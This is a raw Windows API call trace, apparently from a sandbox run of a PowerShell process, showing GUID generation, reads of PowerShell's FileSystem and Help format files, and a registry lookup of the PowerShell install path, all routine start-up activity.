	[0500.278] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xb5588c1c, Data2=0x3df1, Data3=0x4258, Data4=([0]=0xb4, [1]=0x86, [2]=0x78, [3]=0xa4, [4]=0x73, [5]=0xe8, [6]=0xd7, [7]=0x29))) returned 0x0
	[0500.278] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x468ce29c, Data2=0x48b3, Data3=0x4117, Data4=([0]=0x9c, [1]=0x87, [2]=0x49, [3]=0xb4, [4]=0xc5, [5]=0x86, [6]=0xaf, [7]=0xf6))) returned 0x0
	[0500.278] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x38013449, Data2=0xfd50, Data3=0x4cf3, Data4=([0]=0x98, [1]=0x7, [2]=0x3c, [3]=0x8, [4]=0x51, [5]=0xa4, [6]=0xf7, [7]=0x78))) returned 0x0
	[0500.279] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x64301c10, Data2=0x298a, Data3=0x4e18, Data4=([0]=0x96, [1]=0x39, [2]=0x22, [3]=0x95, [4]=0x89, [5]=0xf5, [6]=0x48, [7]=0xe3))) returned 0x0
	[0500.279] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x24d4701d, Data2=0x32ec, Data3=0x4a4c, Data4=([0]=0xbe, [1]=0xe4, [2]=0x8b, [3]=0x63, [4]=0x70, [5]=0x77, [6]=0xcc, [7]=0xb8))) returned 0x0
	[0500.279] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x36d58327, Data2=0xc47d, Data3=0x400a, Data4=([0]=0xa0, [1]=0xc0, [2]=0x6d, [3]=0xca, [4]=0x2a, [5]=0x3, [6]=0xff, [7]=0xb2))) returned 0x0
	[0500.279] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xd05123b9, Data2=0x1e5b, Data3=0x489f, Data4=([0]=0xa3, [1]=0xf6, [2]=0x27, [3]=0x6c, [4]=0x5d, [5]=0x4a, [6]=0x96, [7]=0x6b))) returned 0x0
	[0500.279] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x1579c032, Data2=0x7fcb, Data3=0x4f30, Data4=([0]=0x83, [1]=0x55, [2]=0x8f, [3]=0xa1, [4]=0xe1, [5]=0x1c, [6]=0xd1, [7]=0x1a))) returned 0x0
	[0500.279] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xee138254, Data2=0x5446, Data3=0x4844, Data4=([0]=0xbf, [1]=0x48, [2]=0x6d, [3]=0x66, [4]=0x63, [5]=0x8d, [6]=0x9c, [7]=0xa1))) returned 0x0
	[0500.279] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xa3522c88, Data2=0xa6a4, Data3=0x4955, Data4=([0]=0xa0, [1]=0x2d, [2]=0xfc, [3]=0xbf, [4]=0x6e, [5]=0xa8, [6]=0x49, [7]=0xfb))) returned 0x0
	[0500.279] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x1dc39d1d, Data2=0x9031, Data3=0x4801, Data4=([0]=0xaf, [1]=0x72, [2]=0x1, [3]=0x67, [4]=0x52, [5]=0xc9, [6]=0xd7, [7]=0xc3))) returned 0x0
	[0500.280] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x63fb6b7, Data2=0xfd20, Data3=0x46c3, Data4=([0]=0xae, [1]=0x14, [2]=0xb1, [3]=0x7, [4]=0xf4, [5]=0xd1, [6]=0x29, [7]=0xdc))) returned 0x0
	[0500.280] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xdaeea0e0, Data2=0xc12a, Data3=0x4a07, Data4=([0]=0xbb, [1]=0xfa, [2]=0xda, [3]=0x65, [4]=0x59, [5]=0x76, [6]=0xd4, [7]=0x12))) returned 0x0
	[0500.280] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xcad37ff8, Data2=0x33c4, Data3=0x4aa8, Data4=([0]=0x90, [1]=0x2c, [2]=0x1, [3]=0x80, [4]=0x5b, [5]=0x95, [6]=0x94, [7]=0xc8))) returned 0x0
	[0500.280] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xf6c54172, Data2=0x7dc, Data3=0x4835, Data4=([0]=0xb4, [1]=0xd, [2]=0xda, [3]=0xb7, [4]=0x54, [5]=0x59, [6]=0x6f, [7]=0xd1))) returned 0x0
	[0500.280] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xc0aebc32, Data2=0x9171, Data3=0x4240, Data4=([0]=0x81, [1]=0xb2, [2]=0x7c, [3]=0xcf, [4]=0x78, [5]=0xd0, [6]=0x5b, [7]=0x6d))) returned 0x0
	[0500.280] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x5a93b3c, Data2=0xeadf, Data3=0x45a3, Data4=([0]=0xbd, [1]=0x20, [2]=0xb9, [3]=0x8, [4]=0x3b, [5]=0xd0, [6]=0xd1, [7]=0x32))) returned 0x0
	[0500.280] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x2f8ecfa4, Data2=0xce6c, Data3=0x4c26, Data4=([0]=0xbe, [1]=0x1b, [2]=0xd8, [3]=0xbe, [4]=0x17, [5]=0x2e, [6]=0xca, [7]=0x72))) returned 0x0
	[0500.280] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x90964948, Data2=0xcb48, Data3=0x4a21, Data4=([0]=0xb2, [1]=0x6e, [2]=0x79, [3]=0x9e, [4]=0x8d, [5]=0xb7, [6]=0xb1, [7]=0xc1))) returned 0x0
	[0500.280] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x15b2b01d, Data2=0xa8df, Data3=0x483f, Data4=([0]=0xa3, [1]=0xfd, [2]=0xe, [3]=0x60, [4]=0xa3, [5]=0x12, [6]=0x97, [7]=0x9))) returned 0x0
	[0500.281] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x1c27894d, Data2=0x1b38, Data3=0x4031, Data4=([0]=0xa2, [1]=0x7b, [2]=0x91, [3]=0x38, [4]=0xe6, [5]=0x80, [6]=0x5d, [7]=0xe))) returned 0x0
	[0500.281] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x7a68e669, Data2=0x3db1, Data3=0x44a7, Data4=([0]=0xa7, [1]=0x6e, [2]=0x5a, [3]=0x5, [4]=0x2, [5]=0x19, [6]=0xd4, [7]=0x6e))) returned 0x0
	[0500.281] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xb423cf94, Data2=0x28dd, Data3=0x4eb0, Data4=([0]=0x83, [1]=0xdf, [2]=0x89, [3]=0xc5, [4]=0xa7, [5]=0x54, [6]=0x62, [7]=0x32))) returned 0x0
	[0500.282] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0500.282] GetFileType (hFile=0x320) returned 0x1
	[0500.282] SetErrorMode (uMode=0x1) returned 0x1
	[0500.282] GetFileType (hFile=0x320) returned 0x1
	[0500.282] ReadFile (in: hFile=0x320, lpBuffer=0x2f3eb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f3eb08*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.283] ReadFile (in: hFile=0x320, lpBuffer=0x2f3eb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f3eb08*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.283] ReadFile (in: hFile=0x320, lpBuffer=0x2f3eb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f3eb08*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.283] ReadFile (in: hFile=0x320, lpBuffer=0x2f3eb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f3eb08*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.283] ReadFile (in: hFile=0x320, lpBuffer=0x2f3eb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f3eb08*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.284] ReadFile (in: hFile=0x320, lpBuffer=0x2f3eb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f3eb08*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.284] ReadFile (in: hFile=0x320, lpBuffer=0x2f3eb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f3eb08*, lpNumberOfBytesRead=0x1ad2d8*=0x119, lpOverlapped=0x0) returned 1
	[0500.284] ReadFile (in: hFile=0x320, lpBuffer=0x2f3eb08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f3eb08*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0500.284] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x320) returned 0x0
	[0500.284] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2ec, lpData=0x0, lpcbData=0x1ad2e8*=0x0 | out: lpType=0x1ad2ec*=0x1, lpData=0x0, lpcbData=0x1ad2e8*=0x56) returned 0x0
	[0500.284] CoTaskMemAlloc (cb=0x5a) returned 0x4541e0
	[0500.284] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2bc, lpData=0x4541e0, lpcbData=0x1ad2b8*=0x56 | out: lpType=0x1ad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2b8*=0x56) returned 0x0
	[0500.284] CoTaskMemFree (pv=0x4541e0) 
	[0500.284] RegCloseKey (hKey=0x320) returned 0x0
	[0500.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0500.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0500.285] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x22f3010e, Data2=0xa79b, Data3=0x43af, Data4=([0]=0x8c, [1]=0xa3, [2]=0x58, [3]=0x15, [4]=0xd3, [5]=0x80, [6]=0x3c, [7]=0xbb))) returned 0x0
	[0500.286] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x6a0cb357, Data2=0xa6d6, Data3=0x495b, Data4=([0]=0x9a, [1]=0xb7, [2]=0xcb, [3]=0xd7, [4]=0x51, [5]=0x2c, [6]=0xcb, [7]=0xf4))) returned 0x0
	[0500.286] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x1cbf19ac, Data2=0x34b4, Data3=0x4fef, Data4=([0]=0xa7, [1]=0x88, [2]=0x80, [3]=0x47, [4]=0xee, [5]=0x22, [6]=0xb9, [7]=0x91))) returned 0x0
	[0500.286] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xac3eab13, Data2=0x703, Data3=0x4770, Data4=([0]=0x8d, [1]=0xdc, [2]=0x9c, [3]=0xc1, [4]=0x1a, [5]=0x35, [6]=0xdb, [7]=0x80))) returned 0x0
	[0500.286] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0500.286] GetFileType (hFile=0x320) returned 0x1
	[0500.286] SetErrorMode (uMode=0x1) returned 0x1
	[0500.286] GetFileType (hFile=0x320) returned 0x1
	[0500.286] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.287] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.287] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.288] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.288] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.288] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.288] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.288] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.289] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.289] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.290] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.290] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.290] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.290] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.291] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.291] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.292] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.292] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.292] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.293] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.293] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.293] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.293] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.294] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.294] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.294] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.294] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.295] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.295] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.952] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.952] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.952] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.954] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.955] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.955] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.955] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.955] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.956] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.956] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.956] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.956] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.956] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.956] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.957] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.957] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.957] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.957] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.957] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.957] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.958] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.958] ReadFile (in: hFile=0x320, lpBuffer=0x2f9aca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2f9aca8*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
